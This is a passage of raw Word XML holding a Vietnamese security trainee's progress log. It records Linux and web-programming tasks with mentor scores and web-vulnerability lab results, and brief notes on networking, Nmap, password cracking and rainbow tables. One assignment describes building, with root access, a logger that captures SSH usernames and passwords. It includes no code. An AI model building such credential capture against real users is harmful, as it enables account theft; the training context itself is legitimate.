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6608" w14:textId="5BC66D43" w:rsidR="0062060F" w:rsidRPr="00773012" w:rsidRDefault="0062060F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3535F3C3" w14:textId="77777777" w:rsidR="00773012" w:rsidRPr="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00773012">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Tìm hiểu lệnh hay dùng: xem thông tin OS, cấu hình máy, thông tin mang,…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D55661" w14:textId="77777777" w:rsidR="00773012" w:rsidRPr="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00773012">
        <w:t>Thực hành</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205FBF93"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Viết shell script hiển thị thong tin về hệ thống</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14453974"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Xử lý file: viết shell script đặt lịch thực hiện một số y.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB9E2D2"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cấu hình để có thể truy cập máy ảo thông qua SSH từ máy thật</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3F574B"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webserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2504E39D"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ấu hình virtual host cho web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479CD22E"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mysql,php,wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663807E0"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Lập trình cơ bản C/C++ trên linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E92FC10"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gt; Kết quả 7.75/10: Nhận xét chung của mentor: Phần tìm hiểu các lệnh đơn lẻ làm ổn nhưng phần code các script chưa được tôt lắm, thiếu hoàn thiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DCA391" w14:textId="77777777" w:rsidR="00773012" w:rsidRPr="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00773012">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Lập trình ứng dụng LINUX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267BBC88"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Nắm được các khái niệm user, group, owner của file, folder cờ phân quyền; cơ setuid, setgid của file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FC727D"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Viết chương trình: myid: khi chạy ./myid chương trình y.c nhập username , người dung nhâp chương trình sẽ tìm ra có username tương ưng và hiên thị thông tin id username thư mục home, các group của user nếu không thì báo ko tìm thấy; Chương tình cho phép user đổi mật khẩu mypasswd: khi một user A chạy chương trinh này sẽ y.c nhập mật khẩu cũ nếu pass đung thì sẽ hỏi nhập mật khẩu mới muốn đổi sau đó chương trinh sẽ thực hiện đổi mật khẩu mới cho user đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C11162"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 Nhận xét Bài làm tốt : 10/10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C4ACB4" w14:textId="77777777" w:rsidR="00773012" w:rsidRPr="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00773012">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Lập trình SSH LOGGER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F222F89"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Tìm hiểu cách hoạt động của dich vụ sshd và trình ssh; tìm hiểu cơ chế xác thực pam của hệ điều hành linux; các hoạt động strace, ptrace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8672D0" w14:textId="2691FD31" w:rsid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TH đang nắm quyền root để truy cập vào 1 máy tính linux xây dựng chương trình lấy được username, password ssh trong 2 TH:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42720B09"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lastRenderedPageBreak/>
        <w:t>- Một user tiến hành truy cập vào máy tính đó thông qua ssh→ y.c: log được username, pass đúng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1E425F"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 Một người dùng đứng trên máy tính dó ssh đi một máy khác y.c: username, password được log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE4F1C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Nhận xét: ssh2 chưa hoàn thiện , nộp muộn: 5/10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C5322"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t>Lập trình mạng/ HTTP client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AE1226"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TÌm hiểu giao thức HTTP, công cụ Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFB0AA1"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Viết các chuơng trình thực hiện các chức năng GET, POST, download, upload lên trang wordpress lập trình bằng raw socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD39F9F"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Chưa hoàn thiện đươc download lỗi vòng lăp vô hạn: 7.5/10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309F8E80"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t>Lập trình web cơ bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742A822A"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Lập trình băng PHP không sử dụng framework có sắn, sử dụng DB MySQL để xây dựng web quản lý thông tin sinh viên</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD071E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Yêu cầu ứng dụng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AE9371"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Giao diện website rõ ràng, sạch đẹp (có sử dụng HTML, CSS để định dạng và thiết kế website) (1đ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245B3ECD"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Đăng ký tài khoản và tạo project trên github để quản lý code. Tên project challenge5a_&lt;email_viettel&gt;. Ví dụ challenge5a_khanhpv6 (0.5đ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8515C3"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Deploy ứng dụng lên server public (deloy free lên 000webhost) sử dụng tên website challenge5a_&lt;email_viettel&gt;. Ví dụ challege5a_khanhpv6.000webhostapp.com (0.5đ) Yêu cầu chức năng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA0CB22"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Giáo viên có thể thêm, sửa, xóa các thông tin của sinh viên. Thông tin có các trường cơ bản gồm: tên đăng nhập, mật khẩu, họ tên, email, số điện thoại (1đ)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DA36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Sinh viên sau khi đăng nhập được phép thay đổi các thông tin của mình, cho phép upload avatar từ file hoặc url; sinh viên không được phép thay đổi tên đăng nhập và họ tên (1đ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74928E44"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Một người dùng (giáo viên hoặc sinh viên) bất kỳ đc phép xem danh sách các người dùng trên website và xem thông tin chi tiết của một người dùng khác. Tại trang xem thông tin chi tiết của một người dùng có mục để lại tin nhắn cho người dùng đó, có thể sửa/xóa tin nhắn đã gửi (2đ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3568BD7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Chức năng giao bài, trả bài: o Giáo viên có thể upload file bài tập lên. Các sinh viên có thể xem danh sách bài tập và tải file bài tập về (1đ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E396B41"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xml:space="preserve">Tạo chức năng cho phép giáo viên tổ chức 1 trò chơi giải đố như sau: o Giáo viên tạo challenge, trong đó cần thực hiện: upload lên 1 file txt có nội dung là 1 bài thơ, văn,…, tên file được viết dưới định dạng không dấu và các từ cách nhau bởi 1 khoảng trắng. Sau đó nhập gợi ý về </w:t>
      </w:r>
      <w:r w:rsidRPr="00637B85">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>challenge và submit. (Đáp án chính là tên file mà giáo viên upload lên. Không lưu đáp án ra file, DB,…) (1đ) o Sinh viên xem gợi ý và nhập đáp án. Khi sinh viên nhập đúng thì trả về nội dung bài thơ, văn,… lưu trong file đáp án (1đ).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD45B1A"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Kết quá: Phần sinh viên nộp bài bị lỗi 404 (có thê do để lên host free bị lỗi) bài nộp muộn (ốm covid): 8/10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB7E105"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t>Lập trình web Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254037DD"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Lập trình web bằng framework Laravel sử dụng DB MySql để xây dựng website quản lý thông tin sinh viên, tài liệu của lớp học (y.c giống với bài trên)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AB0F2D" w14:textId="5515698B" w:rsidR="007B1F51" w:rsidRPr="007B1F51"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Kết quả: chưa deploy được trên host; các chức năng demo cơ bản đầy đủ và đạt yêu cầu. Phần code nhìn chưa gọn dàng, mấy chỗ upload code trùng lặp nhau nhưng nhìn chung cungx đạt y.c: 8.5/10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665A7CCD" w14:textId="3872C008" w:rsidR="00773012" w:rsidRPr="00773012" w:rsidRDefault="00773012">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C28F991" w14:textId="77777777" w:rsidR="00773012" w:rsidRPr="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00773012">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>WEB 01: AUTHENTICATION &amp; ACCESS CONTROL: 9/10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFAEE9D" w14:textId="77777777" w:rsidR="00773012" w:rsidRPr="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00773012">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>WEB02: SQL Injection: 9.4/10 (15/16 lab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A0ED0E" w14:textId="48502292" w:rsidR="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00773012">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>WEB03: Directory Traversal, Command Injection, File Upload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>: 10/10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2053C4B4" w14:textId="38A031C8" w:rsidR="00773012" w:rsidRPr="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>WEB04: INFORMATION DISCLOSURE, BUSINESS LOGIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: 9.4/10: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454B22AA" w14:textId="64970BF9" w:rsidR="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Test: hoàn thành đc 4/5 bài</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B3361D" w14:textId="14F46AF0" w:rsidR="00773012" w:rsidRPr="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>WEB05: SSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 9.5/10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C53763E" w14:textId="3A4AD9EC" w:rsidR="00773012" w:rsidRPr="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>WEB06: XXE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 10/10 ( bài ổn writeup có tiến bộ )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A94B7" w14:textId="617C4EEC" w:rsidR="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>WEB07: XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 7.7/10: 26/30 (4 bài xem solution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC3DECC" w14:textId="1E3DB01A" w:rsidR="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WEB08: </w:t>
      </w:r>
      <w:r w:rsidRPr="00773012">
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: 9.1/10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9997D5" w14:textId="389230DD" w:rsidR="00773012" w:rsidRDefault="00773012" w:rsidP="00773012">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>WEB09 . CORS, Clickjacking: 9.2/10</w:t>
      </w:r>
      <w:r w:rsidR="001311A7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (xem solution expert)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647F12E8" w14:textId="72A3A490" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>WEB10: Dom-based vulnerabilities, Websockets: 8.25/10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: (1 bài chưa làm 1 xem solution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3BCE0B" w14:textId="5DEBEEDF" w:rsidR="00773012" w:rsidRDefault="00773012" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F37CB09" w14:textId="5A74F2EE" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53988C6C" w14:textId="711B13B0" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Tìm hiểu về network sec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CF4917" w14:textId="5596CE9C" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t>Học trên UDEMY:</w:t>
      </w:r>
      <w:r w:rsidR="00630F20">
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
        <w:t xml:space="preserve"> ( TH ND)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CA1672" w14:textId="5BDF0889" w:rsidR="00D86A02" w:rsidRPr="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Foundations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2C7467" w14:textId="77777777" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security Triad Mô hình CIA </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F601D0" w14:textId="77777777" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:r>
        <w:t xml:space="preserve">(Confidentiality, Integrity and Availability) Confidentiality : tính bảo mật, bí mật đảm bảo chỉ những người đủ quyền mới được đọc thông tin. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55954871" w14:textId="75D93A72" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:r>
        <w:t>Integrity : tính toàn vẹn, chắc chắn dữ liệu là chính xác và không bị sửa đổi. Availability : tính sẵn sàng, đảm bảo khả năng truy xuất dữ liệu mọi lúc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A4224C" w14:textId="4A031DBC" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Network Topologies ( cấu trúc mạng)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74989ABF" w14:textId="0F8DFD6F" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Communications Models Mô hình kết nối hệ thống mở: OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55404AB6" w14:textId="359E2666" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Kiến trúc TCP/IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F33D9BF" w14:textId="2BC35EDC" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Internet Protocol</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011AF571" w14:textId="1D427DE0" w:rsidR="001311A7" w:rsidRDefault="001311A7" w:rsidP="001311A7">
      <w:r>
        <w:t>Giao thức Internet (IP) là một giao thức, hoặc tập hợp các quy tắc, để định tuyến và định địa chỉ các gói dữ liệu để chúng có thể di chuyển qua các mạng và đến đích chính xác.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="216F5C98" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bluetooth </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162E2E88" w14:textId="7096140C" w:rsidR="001311A7" w:rsidRDefault="00D86A02" w:rsidP="001311A7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Bluetooth là công nghệ giao tiếp tầm ngắn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DF3B12" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cloud Computing </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE5E5B9" w14:textId="733EB8C5" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="001311A7">
      <w:r>
        <w:t>Cloud Computing là việc cung cấp các dịch vụ điện toán hoàn toàn qua Internet. Hay nói đúng hơn là việc cung cấp tài nguyên phù hợp với nhu cầu người dùng hoàn toàn thông qua Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484341D2" w14:textId="7FA62856" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86A02">
        <w:t xml:space="preserve">Ethical Hacking Testing </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86A02">
        <w:rPr>
          <w:rStyle w:val="Heading2Char"/>
          <w:b/>
        </w:rPr>
        <w:t>Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246676FC" w14:textId="09EF7240" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02"/>
    <w:p w14:paraId="41FEA66A" w14:textId="08706AB5" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Open Source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E248BD6" w14:textId="77777777" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>Open source hay mã nguồn mở là phần mềm có bộ source code mà bất cứ ai cũng có thể tải về sử dụng, sửa đổi hoặc thêm một số cập nhật, tính năng vượt trội khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA48F1" w14:textId="6D689CCF" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61549C45" w14:textId="09795328" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
        <w:t>(Network Mapper): là tiện ích mã nguồn mở được sử dụng để quét và phát hiện các lỗ hổng trong mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E77C8AD" w14:textId="16B9CCB9" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Password Cracking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>John the Ripper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EF9857" w14:textId="29D65127" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Tấn công từ điển</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF40E43" w14:textId="38F2C232" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>brute force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5410D094" w14:textId="2E47BC78" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Rainboᴡ Table Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11161021" w14:textId="6362782E" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Rainboᴡ Table là một danh ѕách chứa các giá trị haѕh có ѕố lượng mật khẩu ứng ᴠới ѕố lượng ký tự nào đó. Sử dụng Rainboᴡ Table có thể lấу một cách đơn giản giá trị haѕh được trích rút từ máу tính mục tiêu ᴠà thực hiện một tìm kiếm. Khi </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>giá trị haѕh được tìm thấу trong bảng, bạn ѕẽ có mật khẩu. Rainboᴡ Table thường được ѕử dụng trong phục hồi các mật khẩu chữ thô, lên đến một độ dài nhất định bao gồm một tập hạn chế các ký t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ự</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A959C5" w14:textId="5D5DF0AA" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E6A037" w14:textId="7F832748" w:rsidR="00D86A02" w:rsidRPr="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>O</w:t>
      </w:r>
      <w:r>
        <w:t>penVAS là một trình quét lỗ hổng đánh giá mạng mã nguồn mở và miễn phí. Nó giúp xác định các dịch vụ mạng lỗi thời, thiếu các bản vá bảo mật, máy chủ được cấu hình kém và các lỗ hổng khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C34154" w14:textId="421BC2FF" w:rsidR="00D86A02" w:rsidRDefault="00D86A02" w:rsidP="00D86A02">
      <w:r>
